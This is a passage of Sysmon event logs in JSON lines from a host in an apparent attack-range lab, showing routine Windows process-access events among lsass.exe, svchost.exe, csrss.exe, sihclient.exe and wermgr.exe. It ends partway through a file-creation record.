{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.169\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.169","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.169\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.169","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.420\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.420","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.466\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.466","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.466\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.466","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.466\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1976\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2018-5F25-0000-001099F70500}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.466","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1976","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2018-5F25-0000-001099F70500}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.466\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2018-5F25-0000-001099F70500}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.466","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2018-5F25-0000-001099F70500}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.513\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.513","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:56:08.638\r\nProcessGuid: {41C8662E-2017-5F25-0000-00108FE50500}\r\nProcessId: 616\r\nImage: C:\\Windows\\System32\\sihclient.exe\r\nTargetFilename: 